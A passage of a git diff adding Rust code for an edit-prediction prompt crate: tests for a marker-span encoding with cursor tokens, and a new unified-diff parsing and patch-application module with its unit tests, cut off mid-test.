"") + }); + assert_eq!(stripped, editable); + } + + #[test] + fn test_apply_marker_span_v0317_basic() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker-0|>aaa\nBBB\nccc\n<|marker+1|>"; + let result = apply_marker_span_v0317(old, output, Some(0)).unwrap(); + assert_eq!(result, "aaa\nBBB\nccc\n"); + } + + #[test] + fn test_apply_marker_span_v0317_no_edit() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker-0|><|marker-0|>"; + let result = apply_marker_span_v0317(old, output, Some(0)).unwrap(); + assert_eq!(result, old); + } + + #[test] + fn test_encode_v0317_no_edits() { + let old = "aaa\nbbb\nccc\n"; + let result = + encode_from_old_and_new_v0317(old, old, Some(5), "<|user_cursor|>", "<|end|>").unwrap(); + assert_eq!(result, "<|marker-0|><|marker-0|><|end|>"); + } + + #[test] + fn 
test_roundtrip_v0317() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n"; + let new = "line1\nLINE2\nline3\n\nline5\nLINE6\nline7\nline8\n"; + let cursor = Some(6); + + let encoded = + encode_from_old_and_new_v0317(old, new, cursor, "<|user_cursor|>", "<|end|>").unwrap(); + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let stripped = stripped.replace("<|user_cursor|>", ""); + let reconstructed = apply_marker_span_v0317(old, &stripped, cursor).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_roundtrip_v0317_with_cursor_marker() { + let old = "aaa\nbbb\nccc\n"; + let new = "aaa\nBBB\nccc\n"; + let result = + encode_from_old_and_new_v0317(old, new, Some(5), "<|user_cursor|>", "<|end|>").unwrap(); + assert!(result.contains("<|user_cursor|>"), "result: {result}"); + assert!(result.contains("<|marker-0|>"), "result: {result}"); + } + + #[test] + fn test_compute_marker_offsets_v0318_uses_larger_block_sizes() { + let text = "l1\nl2\nl3\n\nl5\nl6\nl7\nl8\nl9\nl10\nl11\nl12\nl13\n"; + let v0316_offsets = compute_marker_offsets(text); + let v0318_offsets = compute_marker_offsets_v0318(text); + + assert!(v0318_offsets.len() < v0316_offsets.len()); + assert_eq!(v0316_offsets.first().copied(), Some(0)); + assert_eq!(v0318_offsets.first().copied(), Some(0)); + assert_eq!(v0316_offsets.last().copied(), Some(text.len())); + assert_eq!(v0318_offsets.last().copied(), Some(text.len())); + } + + #[test] + fn test_roundtrip_v0318() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n"; + let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n"; + let encoded = + encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let reconstructed = apply_marker_span_v0318(old, stripped).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + 
fn test_roundtrip_v0318_append_at_end_of_editable_region() { + let old = "line1\nline2\nline3\n"; + let new = "line1\nline2\nline3\nline4\n"; + let encoded = + encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + + assert_ne!(encoded, "<|marker_2|><|end|>"); + + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let reconstructed = apply_marker_span_v0318(old, stripped).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_roundtrip_v0318_insert_at_internal_marker_boundary() { + let old = "alpha\nbeta\n\ngamma\ndelta\n"; + let new = "alpha\nbeta\n\ninserted\ngamma\ndelta\n"; + let encoded = + encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let reconstructed = apply_marker_span_v0318(old, stripped).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_encode_v0317_markers_stay_on_line_boundaries() { + let old = "\ +\t\t\t\tcontinue outer; +\t\t\t} +\t\t} +\t} + +\tconst intersectionObserver = new IntersectionObserver((entries) => { +\t\tfor (const entry of entries) { +\t\t\tif (entry.isIntersecting) { +\t\t\t\tintersectionObserver.unobserve(entry.target); +\t\t\t\tanchorPreload(/** @type {HTMLAnchorElement} */ (entry.target)); +\t\t\t} +\t\t} +\t}); + +\tconst observer = new MutationObserver(() => { +\t\tconst links = /** @type {NodeListOf} */ ( +\t\t\tdocument.querySelectorAll('a[data-preload]') +\t\t); + +\t\tfor (const link of links) { +\t\t\tif (linkSet.has(link)) continue; +\t\t\tlinkSet.add(link); + +\t\t\tswitch (link.dataset.preload) { +\t\t\t\tcase '': +\t\t\t\tcase 'true': +\t\t\t\tcase 'hover': { +\t\t\t\t\tlink.addEventListener('mouseenter', function callback() { +\t\t\t\t\t\tlink.removeEventListener('mouseenter', callback); +\t\t\t\t\t\tanchorPreload(link); +\t\t\t\t\t}); +"; + let new = old.replacen( + "\t\t\t\tcase 
'true':\n", + "\t\t\t\tcase 'TRUE':<|user_cursor|>\n", + 1, + ); + + let cursor_offset = new.find("<|user_cursor|>").expect("cursor marker in new"); + let new_without_cursor = new.replace("<|user_cursor|>", ""); + + let encoded = encode_from_old_and_new_v0317( + old, + &new_without_cursor, + Some(cursor_offset), + "<|user_cursor|>", + "<|end|>", + ) + .unwrap(); + + let core = encoded.strip_suffix("<|end|>").unwrap_or(&encoded); + for marker in collect_relative_marker_tags(core) { + let tag_start = marker.tag_start; + assert!( + tag_start == 0 || core.as_bytes()[tag_start - 1] == b'\n', + "marker not at line boundary: {} in output:\n{}", + marker_tag_relative(marker.value), + core + ); + } + } +} diff --git a/crates/zeta_prompt/src/udiff.rs b/crates/zeta_prompt/src/udiff.rs new file mode 100644 index 0000000000000000000000000000000000000000..ab0837b9f54ac0bf9ef74038f0c876b751f70200 --- /dev/null +++ b/crates/zeta_prompt/src/udiff.rs @@ -0,0 +1,1406 @@ +use std::{ + borrow::Cow, + fmt::{Display, Write}, + mem, + ops::Range, +}; + +use anyhow::{Context as _, Result, anyhow}; +use imara_diff::{ + Algorithm, Sink, diff, + intern::{InternedInput, Interner, Token}, +}; + +pub fn strip_diff_path_prefix<'a>(diff: &'a str, prefix: &str) -> Cow<'a, str> { + if prefix.is_empty() { + return Cow::Borrowed(diff); + } + + let prefix_with_slash = format!("{}/", prefix); + let mut needs_rewrite = false; + + for line in diff.lines() { + match DiffLine::parse(line) { + DiffLine::OldPath { path } | DiffLine::NewPath { path } => { + if path.starts_with(&prefix_with_slash) { + needs_rewrite = true; + break; + } + } + _ => {} + } + } + + if !needs_rewrite { + return Cow::Borrowed(diff); + } + + let mut result = String::with_capacity(diff.len()); + for line in diff.lines() { + match DiffLine::parse(line) { + DiffLine::OldPath { path } => { + let stripped = path + .strip_prefix(&prefix_with_slash) + .unwrap_or(path.as_ref()); + result.push_str(&format!("--- a/{}\n", stripped)); + } + 
DiffLine::NewPath { path } => { + let stripped = path + .strip_prefix(&prefix_with_slash) + .unwrap_or(path.as_ref()); + result.push_str(&format!("+++ b/{}\n", stripped)); + } + _ => { + result.push_str(line); + result.push('\n'); + } + } + } + + Cow::Owned(result) +} + +/// Strip unnecessary git metadata lines from a diff, keeping only the lines +/// needed for patch application: path headers (--- and +++), hunk headers (@@), +/// and content lines (+, -, space). +pub fn strip_diff_metadata(diff: &str) -> String { + let mut result = String::new(); + + for line in diff.lines() { + let dominated = DiffLine::parse(line); + match dominated { + // Keep path headers, hunk headers, and content lines + DiffLine::OldPath { .. } + | DiffLine::NewPath { .. } + | DiffLine::HunkHeader(_) + | DiffLine::Context(_) + | DiffLine::Deletion(_) + | DiffLine::Addition(_) + | DiffLine::NoNewlineAtEOF => { + result.push_str(line); + result.push('\n'); + } + // Skip garbage lines (diff --git, index, etc.) + DiffLine::Garbage(_) => {} + } + } + + result +} + +/// Marker used to encode cursor position in patch comment lines. +pub const CURSOR_POSITION_MARKER: &str = "[CURSOR_POSITION]"; + +/// Extract cursor offset from a patch and return `(clean_patch, cursor_offset)`. +/// +/// Cursor position is encoded as a comment line (starting with `#`) containing +/// `[CURSOR_POSITION]`. A `^` in the line indicates the cursor column; a `<` +/// indicates column 0. The offset is computed relative to addition (`+`) and +/// context (` `) lines accumulated so far in the hunk, which represent the +/// cursor position within the new text contributed by the hunk. 
+pub fn extract_cursor_from_patch(patch: &str) -> (String, Option) { + let mut clean_patch = String::new(); + let mut cursor_offset: Option = None; + let mut line_start_offset = 0usize; + let mut prev_line_start_offset = 0usize; + + for line in patch.lines() { + let diff_line = DiffLine::parse(line); + + match &diff_line { + DiffLine::Garbage(content) + if content.starts_with('#') && content.contains(CURSOR_POSITION_MARKER) => + { + let caret_column = if let Some(caret_pos) = content.find('^') { + caret_pos + } else if content.find('<').is_some() { + 0 + } else { + continue; + }; + let cursor_column = caret_column.saturating_sub('#'.len_utf8()); + cursor_offset = Some(prev_line_start_offset + cursor_column); + } + _ => { + if !clean_patch.is_empty() { + clean_patch.push('\n'); + } + clean_patch.push_str(line); + + match diff_line { + DiffLine::Addition(content) | DiffLine::Context(content) => { + prev_line_start_offset = line_start_offset; + line_start_offset += content.len() + 1; + } + _ => {} + } + } + } + } + + if patch.ends_with('\n') && !clean_patch.is_empty() { + clean_patch.push('\n'); + } + + (clean_patch, cursor_offset) +} + +/// Find all byte offsets where `hunk.context` occurs as a substring of `text`. +/// +/// If no exact matches are found and the context ends with `'\n'` but `text` +/// does not, retries without the trailing newline, accepting only a match at +/// the very end of `text`. When this fallback fires, the hunk's context is +/// trimmed and its edit ranges are clamped so that downstream code doesn't +/// index past the end of the matched region. This handles diffs that are +/// missing a `\ No newline at end of file` marker: the parser always appends +/// `'\n'` via `writeln!`, so the context can have a trailing newline that +/// doesn't exist in the source text. 
+pub fn find_context_candidates(text: &str, hunk: &mut Hunk) -> Vec { + let candidates: Vec = text + .match_indices(&hunk.context) + .map(|(offset, _)| offset) + .collect(); + + if !candidates.is_empty() { + return candidates; + } + + if hunk.context.ends_with('\n') && !hunk.context.is_empty() { + let old_len = hunk.context.len(); + hunk.context.pop(); + let new_len = hunk.context.len(); + + if !hunk.context.is_empty() { + let candidates: Vec = text + .match_indices(&hunk.context) + .filter(|(offset, _)| offset + new_len == text.len()) + .map(|(offset, _)| offset) + .collect(); + + if !candidates.is_empty() { + for edit in &mut hunk.edits { + let touched_phantom = edit.range.end > new_len; + edit.range.start = edit.range.start.min(new_len); + edit.range.end = edit.range.end.min(new_len); + if touched_phantom { + // The replacement text was also written with a + // trailing '\n' that corresponds to the phantom + // newline we just removed from the context. + if edit.text.ends_with('\n') { + edit.text.pop(); + } + } + } + return candidates; + } + + // Restore if fallback didn't help either. + hunk.context.push('\n'); + debug_assert_eq!(hunk.context.len(), old_len); + } else { + hunk.context.push('\n'); + } + } + + Vec::new() +} + +/// Given multiple candidate offsets where context matches, use line numbers to disambiguate. +/// Returns the offset that matches the expected line, or None if no match or no line number available. 
+pub fn disambiguate_by_line_number( + candidates: &[usize], + expected_line: Option, + offset_to_line: &dyn Fn(usize) -> u32, +) -> Option { + match candidates.len() { + 0 => None, + 1 => Some(candidates[0]), + _ => { + let expected = expected_line?; + candidates + .iter() + .copied() + .find(|&offset| offset_to_line(offset) == expected) + } + } +} + +pub fn unified_diff_with_context( + old_text: &str, + new_text: &str, + old_start_line: u32, + new_start_line: u32, + context_lines: u32, +) -> String { + let input = InternedInput::new(old_text, new_text); + diff( + Algorithm::Histogram, + &input, + OffsetUnifiedDiffBuilder::new(&input, old_start_line, new_start_line, context_lines), + ) +} + +struct OffsetUnifiedDiffBuilder<'a> { + before: &'a [Token], + after: &'a [Token], + interner: &'a Interner<&'a str>, + pos: u32, + before_hunk_start: u32, + after_hunk_start: u32, + before_hunk_len: u32, + after_hunk_len: u32, + old_line_offset: u32, + new_line_offset: u32, + context_lines: u32, + buffer: String, + dst: String, +} + +impl<'a> OffsetUnifiedDiffBuilder<'a> { + fn new( + input: &'a InternedInput<&'a str>, + old_line_offset: u32, + new_line_offset: u32, + context_lines: u32, + ) -> Self { + Self { + before_hunk_start: 0, + after_hunk_start: 0, + before_hunk_len: 0, + after_hunk_len: 0, + old_line_offset, + new_line_offset, + context_lines, + buffer: String::with_capacity(8), + dst: String::new(), + interner: &input.interner, + before: &input.before, + after: &input.after, + pos: 0, + } + } + + fn print_tokens(&mut self, tokens: &[Token], prefix: char) { + for &token in tokens { + writeln!(&mut self.buffer, "{prefix}{}", self.interner[token]).unwrap(); + } + } + + fn flush(&mut self) { + if self.before_hunk_len == 0 && self.after_hunk_len == 0 { + return; + } + + let end = (self.pos + self.context_lines).min(self.before.len() as u32); + self.update_pos(end, end); + + writeln!( + &mut self.dst, + "@@ -{},{} +{},{} @@", + self.before_hunk_start + 1 + 
self.old_line_offset, + self.before_hunk_len, + self.after_hunk_start + 1 + self.new_line_offset, + self.after_hunk_len, + ) + .unwrap(); + write!(&mut self.dst, "{}", &self.buffer).unwrap(); + self.buffer.clear(); + self.before_hunk_len = 0; + self.after_hunk_len = 0; + } + + fn update_pos(&mut self, print_to: u32, move_to: u32) { + self.print_tokens(&self.before[self.pos as usize..print_to as usize], ' '); + let len = print_to - self.pos; + self.before_hunk_len += len; + self.after_hunk_len += len; + self.pos = move_to; + } +} + +impl Sink for OffsetUnifiedDiffBuilder<'_> { + type Out = String; + + fn process_change(&mut self, before: Range, after: Range) { + if before.start - self.pos > self.context_lines * 2 { + self.flush(); + } + if self.before_hunk_len == 0 && self.after_hunk_len == 0 { + self.pos = before.start.saturating_sub(self.context_lines); + self.before_hunk_start = self.pos; + self.after_hunk_start = after.start.saturating_sub(self.context_lines); + } + + self.update_pos(before.start, before.end); + self.before_hunk_len += before.end - before.start; + self.after_hunk_len += after.end - after.start; + self.print_tokens( + &self.before[before.start as usize..before.end as usize], + '-', + ); + self.print_tokens(&self.after[after.start as usize..after.end as usize], '+'); + } + + fn finish(mut self) -> Self::Out { + self.flush(); + self.dst + } +} + +pub fn encode_cursor_in_patch(patch: &str, cursor_offset: Option) -> String { + let Some(cursor_offset) = cursor_offset else { + return patch.to_string(); + }; + + let mut result = String::new(); + let mut line_start_offset = 0usize; + + for line in patch.lines() { + if matches!( + DiffLine::parse(line), + DiffLine::Garbage(content) + if content.starts_with('#') && content.contains(CURSOR_POSITION_MARKER) + ) { + continue; + } + + if !result.is_empty() { + result.push('\n'); + } + result.push_str(line); + + match DiffLine::parse(line) { + DiffLine::Addition(content) => { + let line_end_offset = 
line_start_offset + content.len(); + + if cursor_offset >= line_start_offset && cursor_offset <= line_end_offset { + let cursor_column = cursor_offset - line_start_offset; + + result.push('\n'); + result.push('#'); + for _ in 0..cursor_column { + result.push(' '); + } + write!(result, "^{}", CURSOR_POSITION_MARKER).unwrap(); + } + + line_start_offset = line_end_offset + 1; + } + DiffLine::Context(content) => { + line_start_offset += content.len() + 1; + } + _ => {} + } + } + + if patch.ends_with('\n') { + result.push('\n'); + } + + result +} + +pub fn apply_diff_to_string(diff_str: &str, text: &str) -> Result { + apply_diff_to_string_with_hunk_offset(diff_str, text).map(|(text, _)| text) +} + +/// Applies a diff to a string and returns the result along with the offset where +/// the first hunk's context matched in the original text. This offset can be used +/// to adjust cursor positions that are relative to the hunk's content. +pub fn apply_diff_to_string_with_hunk_offset( + diff_str: &str, + text: &str, +) -> Result<(String, Option)> { + let mut diff = DiffParser::new(diff_str); + + let mut text = text.to_string(); + let mut first_hunk_offset = None; + + while let Some(event) = diff.next().context("Failed to parse diff")? { + match event { + DiffEvent::Hunk { + mut hunk, + path: _, + status: _, + } => { + let candidates = find_context_candidates(&text, &mut hunk); + + let hunk_offset = + disambiguate_by_line_number(&candidates, hunk.start_line, &|offset| { + text[..offset].matches('\n').count() as u32 + }) + .ok_or_else(|| anyhow!("couldn't resolve hunk"))?; + + if first_hunk_offset.is_none() { + first_hunk_offset = Some(hunk_offset); + } + + for edit in hunk.edits.iter().rev() { + let range = (hunk_offset + edit.range.start)..(hunk_offset + edit.range.end); + text.replace_range(range, &edit.text); + } + } + DiffEvent::FileEnd { .. 
} => {} + } + } + + Ok((text, first_hunk_offset)) +} + +struct PatchFile<'a> { + old_path: Cow<'a, str>, + new_path: Cow<'a, str>, +} + +pub struct DiffParser<'a> { + current_file: Option>, + current_line: Option<(&'a str, DiffLine<'a>)>, + hunk: Hunk, + diff: std::str::Lines<'a>, + pending_start_line: Option, + processed_no_newline: bool, + last_diff_op: LastDiffOp, +} + +#[derive(Clone, Copy, Default)] +enum LastDiffOp { + #[default] + None, + Context, + Deletion, + Addition, +} + +#[derive(Debug, PartialEq)] +pub enum DiffEvent<'a> { + Hunk { + path: Cow<'a, str>, + hunk: Hunk, + status: FileStatus, + }, + FileEnd { + renamed_to: Option>, + }, +} + +#[derive(Debug, Clone, Copy, PartialEq)] +pub enum FileStatus { + Created, + Modified, + Deleted, +} + +#[derive(Debug, Default, PartialEq)] +pub struct Hunk { + pub context: String, + pub edits: Vec, + pub start_line: Option, +} + +impl Hunk { + pub fn is_empty(&self) -> bool { + self.context.is_empty() && self.edits.is_empty() + } +} + +#[derive(Debug, PartialEq)] +pub struct Edit { + pub range: Range, + pub text: String, +} + +impl<'a> DiffParser<'a> { + pub fn new(diff: &'a str) -> Self { + let mut diff = diff.lines(); + let current_line = diff.next().map(|line| (line, DiffLine::parse(line))); + DiffParser { + current_file: None, + hunk: Hunk::default(), + current_line, + diff, + pending_start_line: None, + processed_no_newline: false, + last_diff_op: LastDiffOp::None, + } + } + + pub fn next(&mut self) -> Result>> { + loop { + let (hunk_done, file_done) = match self.current_line.as_ref().map(|e| &e.1) { + Some(DiffLine::OldPath { .. 
}) | Some(DiffLine::Garbage(_)) | None => (true, true), + Some(DiffLine::HunkHeader(_)) => (true, false), + _ => (false, false), + }; + + if hunk_done { + if let Some(file) = &self.current_file + && !self.hunk.is_empty() + { + let status = if file.old_path == "/dev/null" { + FileStatus::Created + } else if file.new_path == "/dev/null" { + FileStatus::Deleted + } else { + FileStatus::Modified + }; + let path = if status == FileStatus::Created { + file.new_path.clone() + } else { + file.old_path.clone() + }; + let mut hunk = mem::take(&mut self.hunk); + hunk.start_line = self.pending_start_line.take(); + self.processed_no_newline = false; + self.last_diff_op = LastDiffOp::None; + return Ok(Some(DiffEvent::Hunk { path, hunk, status })); + } + } + + if file_done { + if let Some(PatchFile { old_path, new_path }) = self.current_file.take() { + return Ok(Some(DiffEvent::FileEnd { + renamed_to: if old_path != new_path && old_path != "/dev/null" { + Some(new_path) + } else { + None + }, + })); + } + } + + let Some((line, parsed_line)) = self.current_line.take() else { + break; + }; + + (|| { + match parsed_line { + DiffLine::OldPath { path } => { + self.current_file = Some(PatchFile { + old_path: path, + new_path: "".into(), + }); + } + DiffLine::NewPath { path } => { + if let Some(current_file) = &mut self.current_file { + current_file.new_path = path + } + } + DiffLine::HunkHeader(location) => { + if let Some(loc) = location { + self.pending_start_line = Some(loc.start_line_old); + } + } + DiffLine::Context(ctx) => { + if self.current_file.is_some() { + writeln!(&mut self.hunk.context, "{ctx}")?; + self.last_diff_op = LastDiffOp::Context; + } + } + DiffLine::Deletion(del) => { + if self.current_file.is_some() { + let range = self.hunk.context.len() + ..self.hunk.context.len() + del.len() + '\n'.len_utf8(); + if let Some(last_edit) = self.hunk.edits.last_mut() + && last_edit.range.end == range.start + { + last_edit.range.end = range.end; + } else { + 
self.hunk.edits.push(Edit { + range, + text: String::new(), + }); + } + writeln!(&mut self.hunk.context, "{del}")?; + self.last_diff_op = LastDiffOp::Deletion; + } + } + DiffLine::Addition(add) => { + if self.current_file.is_some() { + let range = self.hunk.context.len()..self.hunk.context.len(); + if let Some(last_edit) = self.hunk.edits.last_mut() + && last_edit.range.end == range.start + { + writeln!(&mut last_edit.text, "{add}").unwrap(); + } else { + self.hunk.edits.push(Edit { + range, + text: format!("{add}\n"), + }); + } + self.last_diff_op = LastDiffOp::Addition; + } + } + DiffLine::NoNewlineAtEOF => { + if !self.processed_no_newline { + self.processed_no_newline = true; + match self.last_diff_op { + LastDiffOp::Addition => { + // Remove trailing newline from the last addition + if let Some(last_edit) = self.hunk.edits.last_mut() { + last_edit.text.pop(); + } + } + LastDiffOp::Deletion => { + // Remove trailing newline from context (which includes the deletion) + self.hunk.context.pop(); + if let Some(last_edit) = self.hunk.edits.last_mut() { + last_edit.range.end -= 1; + } + } + LastDiffOp::Context | LastDiffOp::None => { + // Remove trailing newline from context + self.hunk.context.pop(); + } + } + } + } + DiffLine::Garbage(_) => {} + } + + anyhow::Ok(()) + })() + .with_context(|| format!("on line:\n\n```\n{}```", line))?; + + self.current_line = self.diff.next().map(|line| (line, DiffLine::parse(line))); + } + + anyhow::Ok(None) + } +} + +#[derive(Debug, PartialEq)] +pub enum DiffLine<'a> { + OldPath { path: Cow<'a, str> }, + NewPath { path: Cow<'a, str> }, + HunkHeader(Option), + Context(&'a str), + Deletion(&'a str), + Addition(&'a str), + NoNewlineAtEOF, + Garbage(&'a str), +} + +#[derive(Debug, PartialEq)] +pub struct HunkLocation { + pub start_line_old: u32, + pub count_old: u32, + pub start_line_new: u32, + pub count_new: u32, +} + +impl<'a> DiffLine<'a> { + pub fn parse(line: &'a str) -> Self { + 
Self::try_parse(line).unwrap_or(Self::Garbage(line)) + } + + fn try_parse(line: &'a str) -> Option { + if line.starts_with("\\ No newline") { + return Some(Self::NoNewlineAtEOF); + } + if let Some(header) = line.strip_prefix("---").and_then(eat_required_whitespace) { + let path = parse_header_path("a/", header); + Some(Self::OldPath { path }) + } else if let Some(header) = line.strip_prefix("+++").and_then(eat_required_whitespace) { + Some(Self::NewPath { + path: parse_header_path("b/", header), + }) + } else if let Some(header) = line.strip_prefix("@@").and_then(eat_required_whitespace) { + if header.starts_with("...") { + return Some(Self::HunkHeader(None)); + } + + let mut tokens = header.split_whitespace(); + let old_range = tokens.next()?.strip_prefix('-')?; + let new_range = tokens.next()?.strip_prefix('+')?; + + let (start_line_old, count_old) = old_range.split_once(',').unwrap_or((old_range, "1")); + let (start_line_new, count_new) = new_range.split_once(',').unwrap_or((new_range, "1")); + + Some(Self::HunkHeader(Some(HunkLocation { + start_line_old: start_line_old.parse::().ok()?.saturating_sub(1), + count_old: count_old.parse().ok()?, + start_line_new: start_line_new.parse::().ok()?.saturating_sub(1), + count_new: count_new.parse().ok()?, + }))) + } else if let Some(deleted_header) = line.strip_prefix("-") { + Some(Self::Deletion(deleted_header)) + } else if line.is_empty() { + Some(Self::Context("")) + } else if let Some(context) = line.strip_prefix(" ") { + Some(Self::Context(context)) + } else { + Some(Self::Addition(line.strip_prefix("+")?)) + } + } +} + +impl<'a> Display for DiffLine<'a> { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + match self { + DiffLine::OldPath { path } => write!(f, "--- {path}"), + DiffLine::NewPath { path } => write!(f, "+++ {path}"), + DiffLine::HunkHeader(Some(hunk_location)) => { + write!( + f, + "@@ -{},{} +{},{} @@", + hunk_location.start_line_old + 1, + hunk_location.count_old, + 
hunk_location.start_line_new + 1, + hunk_location.count_new + ) + } + DiffLine::HunkHeader(None) => write!(f, "@@ ... @@"), + DiffLine::Context(content) => write!(f, " {content}"), + DiffLine::Deletion(content) => write!(f, "-{content}"), + DiffLine::Addition(content) => write!(f, "+{content}"), + DiffLine::NoNewlineAtEOF => write!(f, "\\ No newline at end of file"), + DiffLine::Garbage(line) => write!(f, "{line}"), + } + } +} + +fn parse_header_path<'a>(strip_prefix: &'static str, header: &'a str) -> Cow<'a, str> { + if !header.contains(['"', '\\']) { + let path = header.split_ascii_whitespace().next().unwrap_or(header); + return Cow::Borrowed(path.strip_prefix(strip_prefix).unwrap_or(path)); + } + + let mut path = String::with_capacity(header.len()); + let mut in_quote = false; + let mut chars = header.chars().peekable(); + let mut strip_prefix = Some(strip_prefix); + + while let Some(char) = chars.next() { + if char == '"' { + in_quote = !in_quote; + } else if char == '\\' { + let Some(&next_char) = chars.peek() else { + break; + }; + chars.next(); + path.push(next_char); + } else if char.is_ascii_whitespace() && !in_quote { + break; + } else { + path.push(char); + } + + if let Some(prefix) = strip_prefix + && path == prefix + { + strip_prefix.take(); + path.clear(); + } + } + + Cow::Owned(path) +} + +fn eat_required_whitespace(header: &str) -> Option<&str> { + let trimmed = header.trim_ascii_start(); + + if trimmed.len() == header.len() { + None + } else { + Some(trimmed) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use indoc::indoc; + + #[test] + fn parse_lines_simple() { + let input = indoc! 
{" + diff --git a/text.txt b/text.txt + index 86c770d..a1fd855 100644 + --- a/file.txt + +++ b/file.txt + @@ -1,2 +1,3 @@ + context + -deleted + +inserted + garbage + + --- b/file.txt + +++ a/file.txt + "}; + + let lines = input.lines().map(DiffLine::parse).collect::>(); + + assert_eq!( + lines, + &[ + DiffLine::Garbage("diff --git a/text.txt b/text.txt"), + DiffLine::Garbage("index 86c770d..a1fd855 100644"), + DiffLine::OldPath { + path: "file.txt".into() + }, + DiffLine::NewPath { + path: "file.txt".into() + }, + DiffLine::HunkHeader(Some(HunkLocation { + start_line_old: 0, + count_old: 2, + start_line_new: 0, + count_new: 3 + })), + DiffLine::Context("context"), + DiffLine::Deletion("deleted"), + DiffLine::Addition("inserted"), + DiffLine::Garbage("garbage"), + DiffLine::Context(""), + DiffLine::OldPath { + path: "b/file.txt".into() + }, + DiffLine::NewPath { + path: "a/file.txt".into() + }, + ] + ); + } + + #[test] + fn file_header_extra_space() { + let options = ["--- file", "--- file", "---\tfile"]; + + for option in options { + assert_eq!( + DiffLine::parse(option), + DiffLine::OldPath { + path: "file".into() + }, + "{option}", + ); + } + } + + #[test] + fn hunk_header_extra_space() { + let options = [ + "@@ -1,2 +1,3 @@", + "@@ -1,2 +1,3 @@", + "@@\t-1,2\t+1,3\t@@", + "@@ -1,2 +1,3 @@", + "@@ -1,2 +1,3 @@", + "@@ -1,2 +1,3 @@", + "@@ -1,2 +1,3 @@ garbage", + ]; + + for option in options { + assert_eq!( + DiffLine::parse(option), + DiffLine::HunkHeader(Some(HunkLocation { + start_line_old: 0, + count_old: 2, + start_line_new: 0, + count_new: 3 + })), + "{option}", + ); + } + } + + #[test] + fn hunk_header_without_location() { + assert_eq!(DiffLine::parse("@@ ... 
@@"), DiffLine::HunkHeader(None)); + } + + #[test] + fn test_parse_path() { + assert_eq!(parse_header_path("a/", "foo.txt"), "foo.txt"); + assert_eq!( + parse_header_path("a/", "foo/bar/baz.txt"), + "foo/bar/baz.txt" + ); + assert_eq!(parse_header_path("a/", "a/foo.txt"), "foo.txt"); + assert_eq!( + parse_header_path("a/", "a/foo/bar/baz.txt"), + "foo/bar/baz.txt" + ); + + // Extra + assert_eq!( + parse_header_path("a/", "a/foo/bar/baz.txt 2025"), + "foo/bar/baz.txt" + ); + assert_eq!( + parse_header_path("a/", "a/foo/bar/baz.txt\t2025"), + "foo/bar/baz.txt" + ); + assert_eq!( + parse_header_path("a/", "a/foo/bar/baz.txt \""), + "foo/bar/baz.txt" + ); + + // Quoted + assert_eq!( + parse_header_path("a/", "a/foo/bar/\"baz quox.txt\""), + "foo/bar/baz quox.txt" + ); + assert_eq!( + parse_header_path("a/", "\"a/foo/bar/baz quox.txt\""), + "foo/bar/baz quox.txt" + ); + assert_eq!( + parse_header_path("a/", "\"foo/bar/baz quox.txt\""), + "foo/bar/baz quox.txt" + ); + assert_eq!(parse_header_path("a/", "\"whatever 🤷\""), "whatever 🤷"); + assert_eq!( + parse_header_path("a/", "\"foo/bar/baz quox.txt\" 2025"), + "foo/bar/baz quox.txt" + ); + // unescaped quotes are dropped + assert_eq!(parse_header_path("a/", "foo/\"bar\""), "foo/bar"); + + // Escaped + assert_eq!( + parse_header_path("a/", "\"foo/\\\"bar\\\"/baz.txt\""), + "foo/\"bar\"/baz.txt" + ); + assert_eq!( + parse_header_path("a/", "\"C:\\\\Projects\\\\My App\\\\old file.txt\""), + "C:\\Projects\\My App\\old file.txt" + ); + } + + #[test] + fn test_parse_diff_with_leading_and_trailing_garbage() { + let diff = indoc! {" + I need to make some changes. + + I'll change the following things: + - one + - two + - three + + ``` + --- a/file.txt + +++ b/file.txt + one + +AND + two + ``` + + Summary of what I did: + - one + - two + - three + + That's about it. 
+ "}; + + let mut events = Vec::new(); + let mut parser = DiffParser::new(diff); + while let Some(event) = parser.next().unwrap() { + events.push(event); + } + + assert_eq!( + events, + &[ + DiffEvent::Hunk { + path: "file.txt".into(), + hunk: Hunk { + context: "one\ntwo\n".into(), + edits: vec![Edit { + range: 4..4, + text: "AND\n".into() + }], + start_line: None, + }, + status: FileStatus::Modified, + }, + DiffEvent::FileEnd { renamed_to: None } + ], + ) + } + + #[test] + fn test_no_newline_at_eof() { + let diff = indoc! {" + --- a/file.py + +++ b/file.py + @@ -55,7 +55,3 @@ class CustomDataset(Dataset): + torch.set_rng_state(state) + mask = self.transform(mask) + + - if self.mode == 'Training': + - return (img, mask, name) + - else: + - return (img, mask, name) + \\ No newline at end of file + "}; + + let mut events = Vec::new(); + let mut parser = DiffParser::new(diff); + while let Some(event) = parser.next().unwrap() { + events.push(event); + } + + assert_eq!( + events, + &[ + DiffEvent::Hunk { + path: "file.py".into(), + hunk: Hunk { + context: concat!( + " torch.set_rng_state(state)\n", + " mask = self.transform(mask)\n", + "\n", + " if self.mode == 'Training':\n", + " return (img, mask, name)\n", + " else:\n", + " return (img, mask, name)", + ) + .into(), + edits: vec![Edit { + range: 80..203, + text: "".into() + }], + start_line: Some(54), // @@ -55,7 -> line 54 (0-indexed) + }, + status: FileStatus::Modified, + }, + DiffEvent::FileEnd { renamed_to: None } + ], + ); + } + + #[test] + fn test_no_newline_at_eof_addition() { + let diff = indoc! 
